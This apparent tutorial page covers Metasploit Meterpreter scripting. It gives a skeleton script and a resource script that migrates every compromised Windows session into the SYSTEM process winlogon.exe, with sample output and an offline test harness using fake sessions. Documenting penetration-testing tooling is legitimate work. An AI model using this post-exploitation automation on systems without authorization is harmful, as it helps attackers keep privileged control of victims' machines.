Meterpreter Scripting

Since Meterpreter scripting is deprecated and planned to be replaced by post modules, we only include a skeleton Meterpreter script here.

You can place your new Meterpreter script in either of these locations:

  • the framework itself, metasploit-framework/scripts/meterpreter, or

  • your Metasploit user directory, ~/.msf4/scripts/meterpreter

Skeleton Meterpreter Script

# $Id$
# $Revision$
# Author:
#-------------------------------------------------------------------------------
################## Variable Declarations ##################

# Instance variables are used on purpose: local variables defined here are
# not visible inside the method definitions below.
@client = client
@sample_option_var = nil
@exec_opts = Rex::Parser::Arguments.new(
    "-h" => [ false, "Help menu." ],
    "-o" => [ true , "Option that requires a value"]
    )
@meter_type = client.platform

################## Function Declarations ##################

# Usage Message Function
#-------------------------------------------------------------------------------
def usage
    print_line "Meterpreter Script for INSERT PURPOSE."
    print_line(@exec_opts.usage)
    raise Rex::Script::Completed
end

# Wrong Meterpreter Version Message Function
#-------------------------------------------------------------------------------
def wrong_meter_version(meter = @meter_type)
    print_error("#{meter} version of Meterpreter is not supported with this Script!")
    raise Rex::Script::Completed
end

################## Main ##################
# args holds the arguments passed to the script on the Meterpreter command line
@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage
    when "-o"
        @sample_option_var = val
    end
}

# Check for Version of Meterpreter
# client.platform is e.g. "windows", "linux", "java" or "php" in current
# Metasploit (older releases returned strings such as "x86/win32").
# Remove the platforms your script does not support.
wrong_meter_version(@meter_type) if @meter_type !~ /windows|win32|win64|java|php|linux/i

The script is quoted directly from the Metasploit sample scripts.

Run process migration on multiple Meterpreter sessions

From `msfconsole`, after you have obtained all your Meterpreter sessions, select the post/windows/manage/migrate module:

use post/windows/manage/migrate

Note: make sure you have sufficient privileges to migrate into the target process. winlogon.exe runs as SYSTEM, so the session needs to be SYSTEM or an elevated session holding SeDebugPrivilege.

Then create a resource file (.rc extension) with the Ruby code wrapped in <ruby> </ruby> tags:

mass-migration.rc

<ruby>
# Find the PID of a process by name in a given session.
# Returns nil when the process is not running, so the caller can skip the
# session instead of issuing "set PID" with an empty value.
def find_pid(session_num, session, process)
  print_status("Session #{session_num} | Finding PID of process #{process}")
  session.sys.process.get_processes().each do |x|
    proc_name, proc_id = x['name'].downcase, x['pid']

    return proc_id if proc_name == process.downcase
  end
  nil
end

process = 'winlogon.exe'
framework.sessions.each do |num, session|
  # post/windows/manage/migrate only works against Windows Meterpreter sessions
  unless session.type == 'meterpreter' && session.platform =~ /win/i
    print_error("Session #{num} is not a Windows Meterpreter session, skipping")
    next
  end
  pid = find_pid(num, session, process)
  if pid.nil?
    print_error("Session #{num} | #{process} not found, skipping")
    next
  end
  run_single("set PID #{pid}")
  run_single("set SESSION #{num}")
  print_status("Running #{active_module.fullname} against session #{num}")
  run_single("run -j")
  sleep 1
end
</ruby>

Now, from msfconsole,

resource /home/rubyfu/mass-migration.rc

The result will be similar to:

[*] Running post/windows/manage/migrate against session 2
[*] Post module running as background job

[*] Running module against WIN-NG118S6TM0H
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate to
[*] Session 2 | Finding PID of process winlogon.exe
[+] Migrating to 3628
SESSION => 3
[*] Running post/windows/manage/migrate against session 3
[*] Post module running as background job
[*] Running module against HOME
[*] Current server process: shell.exe (2684)
[*] Session 3 | Finding PID of process winlogon.exe
[+] Migrating to 2444
SESSION => 4
[*] Running post/windows/manage/migrate against session 4
[*] Post module running as background job
[*] Running module against WIN-8H4IDI0SR5A
[*] Current server process: shell.exe (2996)
[*] Session 4 | Finding PID of process winlogon.exe
[+] Migrating to 2240

[+] Successfully migrated to process 3628
[+] Successfully migrated to process 2444
[+] Successfully migrated to process 2240
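To exercise the session-selection logic without live targets, here is an added example (not from the RubyFu page and not Metasploit code) that factors the resource script above into functions you can run offline. The `FakeSession` objects and their process lists are constructed stand-ins for what msfconsole's `framework.sessions` and `session.sys.process.get_processes` would return, and the `runner` callable stands in for `run_single`. It goes slightly beyond the script: it skips sessions that are not Windows Meterpreter sessions or that have no copy of the target process, never emits an empty `set PID`, and when several processes share the name (multiple winlogon.exe on a multi-session host) it picks the lowest PID.

```ruby
# Added example, not from the RubyFu page or from Metasploit.
# FakeProcess/FakeSys/FakeSession are constructed stand-ins for the objects
# msfconsole supplies inside a <ruby> block of an .rc file.

# Pick the PID to migrate into. `processes` has the shape returned by
# session.sys.process.get_processes: an array of hashes with 'pid' and 'name'.
# Returns nil when no candidate exists so the caller can skip the session
# instead of issuing "set PID" with an empty value.
def select_target_pid(processes, target_name, current_pid)
  candidates = processes.select do |p|
    p['name'].to_s.casecmp?(target_name) && p['pid'] != current_pid
  end
  # Lowest PID first: with several instances of the same name this is
  # usually the earliest-started (session 0/1) one.
  candidates.map { |p| p['pid'] }.min
end

# Build the msfconsole command sequence for every usable session.
# Non-Meterpreter and non-Windows sessions are skipped because
# post/windows/manage/migrate cannot run against them.
# Returns [plan, skipped] where plan is [[session_id, [commands]], ...]
# and skipped is [[session_id, reason], ...].
def plan_migration(sessions, target_name)
  plan = []
  skipped = []
  sessions.each do |num, session|
    unless session.type == 'meterpreter' && session.platform =~ /win/i
      skipped << [num, 'not a Windows Meterpreter session']
      next
    end
    pid = select_target_pid(session.sys.process.get_processes,
                            target_name, session.sys.process.getpid)
    if pid.nil?
      skipped << [num, "no #{target_name} process found"]
      next
    end
    plan << [num, ["set PID #{pid}", "set SESSION #{num}", "run -j"]]
  end
  [plan, skipped]
end

# Execute the plan through `runner`; in a real .rc <ruby> block this would be
# method(:run_single). Returns the session ids that were dispatched.
def run_migration(sessions, target_name, runner)
  plan, skipped = plan_migration(sessions, target_name)
  skipped.each { |num, why| puts "[-] Session #{num} skipped: #{why}" }
  plan.each do |num, cmds|
    puts "[*] Session #{num}: migrating into #{target_name}"
    cmds.each { |c| runner.call(c) }
  end
  plan.map(&:first)
end

# Constructed stand-ins (assumed shapes, modelled on Meterpreter's
# session.sys.process API: getpid and get_processes).
FakeProcess = Struct.new(:current_pid, :procs) do
  def getpid; current_pid; end
  def get_processes; procs; end
end
FakeSys = Struct.new(:process)
FakeSession = Struct.new(:type, :platform, :sys)

# Constructed sample data: two Windows Meterpreter sessions (one reporting the
# current "windows" platform string, one the older "x86/win32" form), a plain
# Linux shell, and a Windows session where winlogon.exe is absent.
def sample_sessions
  {
    2 => FakeSession.new('meterpreter', 'windows',
           FakeSys.new(FakeProcess.new(3968, [
             { 'pid' => 4,    'name' => 'System' },
             { 'pid' => 3628, 'name' => 'winlogon.exe' },
             { 'pid' => 3968, 'name' => 'shell.exe' },
           ]))),
    3 => FakeSession.new('meterpreter', 'x86/win32',
           FakeSys.new(FakeProcess.new(2684, [
             { 'pid' => 5120, 'name' => 'winlogon.exe' },
             { 'pid' => 2444, 'name' => 'WINLOGON.EXE' },
             { 'pid' => 2684, 'name' => 'shell.exe' },
           ]))),
    4 => FakeSession.new('shell', 'linux', nil),
    5 => FakeSession.new('meterpreter', 'windows',
           FakeSys.new(FakeProcess.new(1000, [
             { 'pid' => 1000, 'name' => 'shell.exe' },
           ]))),
  }
end

if __FILE__ == $0
  run_migration(sample_sessions, 'winlogon.exe', ->(cmd) { puts "    msf> #{cmd}" })
end
```

In the real resource file you would drop the fake objects, pass `framework.sessions` and `method(:run_single)` to `run_migration`, and keep the `sleep 1` between sessions so the background jobs do not all start at once.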
